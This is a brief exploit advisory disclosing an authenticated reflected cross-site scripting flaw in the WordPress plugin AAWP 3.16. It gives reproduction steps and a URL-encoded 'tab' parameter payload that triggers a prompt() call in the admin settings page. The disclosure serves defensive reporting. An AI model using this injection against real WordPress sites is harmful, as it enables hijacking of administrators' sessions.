WordPress AAWP 3.16 Cross Site Scripting

`# Exploit Title: WordPress Plugin AAWP 3.16 - 'tab' Reflected Cross Site Scripting (XSS) (Authenticated)  
# Date: 04/01/2022  
# Exploit Author: Andrea Bocchetti  
# Vendor Homepage: https://getaawp.com/  
# Software Link: https://getaawp.com/  
# Version: 3.16  
# Tested on: Windows 10 - Chrome, WordPress 5.8.2  
  
# Proof of Concept:  
# 1- Install and activate AAWP 3.16 plugin.  
# 2- Go to https://localhost.com/wp-admin/admin.php?page=aawp-settings&tab=XXXX  
# 3- Add payload to the Tab, the XSS Payload: %22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22%40x.y  
# 4- XSS has been triggered.  
  
# Go to this url "http://localhost/wp-admin/admin.php?page=aawp-settings&tab=%22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22%40x.y"  
XSS will trigger.  
  
`